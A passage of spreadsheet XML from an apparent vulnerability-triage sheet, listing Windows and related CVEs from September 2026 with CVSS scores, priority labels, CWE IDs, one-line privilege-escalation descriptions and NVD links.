      <c r="B2202" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69725</t>
        </is>
      </c>
      <c r="C2202" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2202" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2202" s="5" t="inlineStr"/>
      <c r="F2202" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2202" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2202" s="5" t="inlineStr"/>
      <c r="I2202" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2202" s="5" t="inlineStr"/>
      <c r="K2202" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L2202" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2202" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69725</t>
        </is>
      </c>
    </row>
    <row r="2203">
      <c r="A2203" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2203" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69731</t>
        </is>
      </c>
      <c r="C2203" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2203" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2203" s="5" t="inlineStr"/>
      <c r="F2203" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2203" s="5" t="inlineStr"/>
      <c r="H2203" s="5" t="inlineStr"/>
      <c r="I2203" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2203" s="5" t="inlineStr"/>
      <c r="K2203" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2203" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in HID class driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2203" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69731</t>
        </is>
      </c>
    </row>
    <row r="2204">
      <c r="A2204" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2204" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69738</t>
        </is>
      </c>
      <c r="C2204" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2204" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2204" s="5" t="inlineStr"/>
      <c r="F2204" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2204" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2204" s="5" t="inlineStr"/>
      <c r="I2204" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2204" s="5" t="inlineStr"/>
      <c r="K2204" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="L2204" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2204" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69738</t>
        </is>
      </c>
    </row>
    <row r="2205">
      <c r="A2205" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2205" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69758</t>
        </is>
      </c>
      <c r="C2205" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2205" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2205" s="5" t="inlineStr"/>
      <c r="F2205" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2205" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2205" s="5" t="inlineStr"/>
      <c r="I2205" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2205" s="5" t="inlineStr"/>
      <c r="K2205" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2205" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Universal Disk Format File System Driver (UDFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2205" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69758</t>
        </is>
      </c>
    </row>
    <row r="2206">
      <c r="A2206" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2206" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69785</t>
        </is>
      </c>
      <c r="C2206" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2206" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2206" s="5" t="inlineStr"/>
      <c r="F2206" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2206" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2206" s="5" t="inlineStr"/>
      <c r="I2206" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2206" s="5" t="inlineStr"/>
      <c r="K2206" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="L2206" s="5" t="inlineStr">
        <is>
          <t>Untrusted search path in Windows Smart Card allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2206" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69785</t>
        </is>
      </c>
    </row>
    <row r="2207">
      <c r="A2207" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2207" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69787</t>
        </is>
      </c>
      <c r="C2207" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2207" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2207" s="5" t="inlineStr"/>
      <c r="F2207" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2207" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2207" s="5" t="inlineStr"/>
      <c r="I2207" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2207" s="5" t="inlineStr"/>
      <c r="K2207" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2207" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2207" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69787</t>
        </is>
      </c>
    </row>
    <row r="2208">
      <c r="A2208" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2208" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69790</t>
        </is>
      </c>
      <c r="C2208" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2208" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2208" s="5" t="inlineStr"/>
      <c r="F2208" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2208" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2208" s="5" t="inlineStr"/>
      <c r="I2208" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2208" s="5" t="inlineStr"/>
      <c r="K2208" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2208" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Credential Providers allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2208" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69790</t>
        </is>
      </c>
    </row>
    <row r="2209">
      <c r="A2209" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2209" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69799</t>
        </is>
      </c>
      <c r="C2209" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2209" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2209" s="5" t="inlineStr"/>
      <c r="F2209" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2209" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2209" s="5" t="inlineStr"/>
      <c r="I2209" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2209" s="5" t="inlineStr"/>
      <c r="K2209" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L2209" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2209" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69799</t>
        </is>
      </c>
    </row>
    <row r="2210">
      <c r="A2210" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2210" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69801</t>
        </is>
      </c>
      <c r="C2210" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2210" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2210" s="5" t="inlineStr"/>
      <c r="F2210" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2210" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2210" s="5" t="inlineStr"/>
      <c r="I2210" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2210" s="5" t="inlineStr"/>
      <c r="K2210" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2210" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2210" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69801</t>
        </is>
      </c>
    </row>
    <row r="2211">
      <c r="A2211" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2211" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69821</t>
        </is>
      </c>
      <c r="C2211" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2211" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2211" s="5" t="inlineStr"/>
      <c r="F2211" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2211" s="5" t="inlineStr">
        <is>
          <t>active directory</t>
        </is>
      </c>
      <c r="H2211" s="5" t="inlineStr"/>
      <c r="I2211" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2211" s="5" t="inlineStr"/>
      <c r="K2211" s="5" t="inlineStr">
        <is>
          <t>CWE-116</t>
        </is>
      </c>
      <c r="L2211" s="5" t="inlineStr">
        <is>
          <t>Improper encoding or escaping of output in Active Directory Certificate Services (AD CS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2211" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69821</t>
        </is>
      </c>
    </row>
    <row r="2212">
      <c r="A2212" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2212" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69822</t>
        </is>
      </c>
      <c r="C2212" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2212" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2212" s="5" t="inlineStr"/>
      <c r="F2212" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2212" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2212" s="5" t="inlineStr"/>
      <c r="I2212" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2212" s="5" t="inlineStr"/>
      <c r="K2212" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-197</t>
        </is>
      </c>
      <c r="L2212" s="5" t="inlineStr">
        <is>
          <t>Numeric truncation error in Windows Kerberos allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2212" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69822</t>
        </is>
      </c>
    </row>
    <row r="2213">
      <c r="A2213" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2213" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69841</t>
        </is>
      </c>
      <c r="C2213" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2213" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2213" s="5" t="inlineStr"/>
      <c r="F2213" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2213" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2213" s="5" t="inlineStr"/>
      <c r="I2213" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2213" s="5" t="inlineStr"/>
      <c r="K2213" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2213" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Encrypting File System (EFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2213" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69841</t>
        </is>
      </c>
    </row>
    <row r="2214">
      <c r="A2214" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2214" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69844</t>
        </is>
      </c>
      <c r="C2214" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2214" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2214" s="5" t="inlineStr"/>
      <c r="F2214" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2214" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2214" s="5" t="inlineStr"/>
      <c r="I2214" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2214" s="5" t="inlineStr"/>
      <c r="K2214" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2214" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2214" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69844</t>
        </is>
      </c>
    </row>
    <row r="2215">
      <c r="A2215" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2215" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69864</t>
        </is>
      </c>
      <c r="C2215" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2215" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2215" s="5" t="inlineStr"/>
      <c r="F2215" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2215" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2215" s="5" t="inlineStr"/>
      <c r="I2215" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2215" s="5" t="inlineStr"/>
      <c r="K2215" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2215" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2215" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69864</t>
        </is>
      </c>
    </row>
    <row r="2216">
      <c r="A2216" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2216" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69900</t>
        </is>
      </c>
      <c r="C2216" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2216" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2216" s="5" t="inlineStr"/>
      <c r="F2216" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2216" s="5" t="inlineStr"/>
      <c r="H2216" s="5" t="inlineStr"/>
      <c r="I2216" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2216" s="5" t="inlineStr"/>
      <c r="K2216" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="L2216" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Kernel Streaming WOW Thunk Service Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2216" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69900</t>
        </is>
      </c>
    </row>
    <row r="2217">
      <c r="A2217" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2217" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69907</t>
        </is>
      </c>
      <c r="C2217" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2217" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2217" s="5" t="inlineStr"/>
      <c r="F2217" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2217" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2217" s="5" t="inlineStr"/>
      <c r="I2217" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2217" s="5" t="inlineStr"/>
      <c r="K2217" s="5" t="inlineStr">
        <is>
          <t>CWE-280</t>
        </is>
      </c>
      <c r="L2217" s="5" t="inlineStr">
        <is>
          <t>Improper handling of insufficient permissions or privileges in Windows Enterprise App Management allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2217" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69907</t>
        </is>
      </c>
    </row>
    <row r="2218">
      <c r="A2218" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2218" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69921</t>
        </is>
      </c>
      <c r="C2218" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2218" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2218" s="5" t="inlineStr"/>
      <c r="F2218" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2218" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2218" s="5" t="inlineStr"/>
      <c r="I2218" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2218" s="5" t="inlineStr"/>
      <c r="K2218" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2218" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2218" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69921</t>
        </is>
      </c>
    </row>
    <row r="2219">
      <c r="A2219" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2219" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70289</t>
        </is>
      </c>
      <c r="C2219" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2219" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2219" s="5" t="inlineStr"/>
      <c r="F2219" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2219" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2219" s="5" t="inlineStr"/>
      <c r="I2219" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2219" s="5" t="inlineStr"/>
      <c r="K2219" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2219" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Win32 Kernel Subsystem allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2219" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70289</t>
        </is>
      </c>
    </row>
    <row r="2220">
      <c r="A2220" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2220" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70334</t>
        </is>
      </c>
      <c r="C2220" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2220" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2220" s="5" t="inlineStr"/>
      <c r="F2220" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2220" s="5" t="inlineStr"/>
      <c r="H2220" s="5" t="inlineStr"/>
      <c r="I2220" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2220" s="5" t="inlineStr"/>
      <c r="K2220" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="L2220" s="5" t="inlineStr">
        <is>
          <t>Incomplete list of disallowed inputs in Visual Studio Code allows an unauthorized attacker to bypass a security feature locally.</t>
        </is>
      </c>
      <c r="M2220" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70334</t>
        </is>
      </c>
    </row>
    <row r="2221">
      <c r="A2221" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2221" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70564</t>
        </is>
      </c>
      <c r="C2221" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2221" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2221" s="5" t="inlineStr"/>
      <c r="F2221" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2221" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2221" s="5" t="inlineStr"/>
      <c r="I2221" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2221" s="5" t="inlineStr"/>
      <c r="K2221" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2221" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2221" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70564</t>
        </is>
      </c>
    </row>
    <row r="2222">
      <c r="A2222" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2222" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70569</t>
        </is>
      </c>
      <c r="C2222" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2222" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2222" s="5" t="inlineStr"/>
      <c r="F2222" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2222" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2222" s="5" t="inlineStr"/>
      <c r="I2222" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2222" s="5" t="inlineStr"/>
      <c r="K2222" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2222" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2222" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70569</t>
        </is>
      </c>
    </row>
    <row r="2223">
      <c r="A2223" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2223" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70572</t>
        </is>
      </c>
      <c r="C2223" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2223" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2223" s="5" t="inlineStr"/>
      <c r="F2223" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2223" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2223" s="5" t="inlineStr"/>
      <c r="I2223" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2223" s="5" t="inlineStr"/>
      <c r="K2223" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2223" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2223" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70572</t>
        </is>
      </c>
    </row>
    <row r="2224">
      <c r="A2224" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2224" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70574</t>
        </is>
      </c>
      <c r="C2224" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2224" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2224" s="5" t="inlineStr"/>
      <c r="F2224" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2224" s="5" t="inlineStr"/>
      <c r="H2224" s="5" t="inlineStr"/>
      <c r="I2224" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2224" s="5" t="inlineStr"/>
      <c r="K2224" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2224" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2224" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70574</t>
        </is>
      </c>
    </row>
    <row r="2225">
      <c r="A2225" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2225" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70581</t>
        </is>
      </c>
      <c r="C2225" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2225" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2225" s="5" t="inlineStr"/>
      <c r="F2225" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2225" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2225" s="5" t="inlineStr"/>
      <c r="I2225" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2225" s="5" t="inlineStr"/>
      <c r="K2225" s="5" t="inlineStr">
        <is>
          <t>CWE-190, CWE-20</t>
        </is>
      </c>
      <c r="L2225" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2225" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70581</t>
        </is>
      </c>
    </row>
    <row r="2226">
      <c r="A2226" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2226" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70583</t>
        </is>
      </c>
      <c r="C2226" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2226" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2226" s="5" t="inlineStr"/>
      <c r="F2226" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2226" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2226" s="5" t="inlineStr"/>
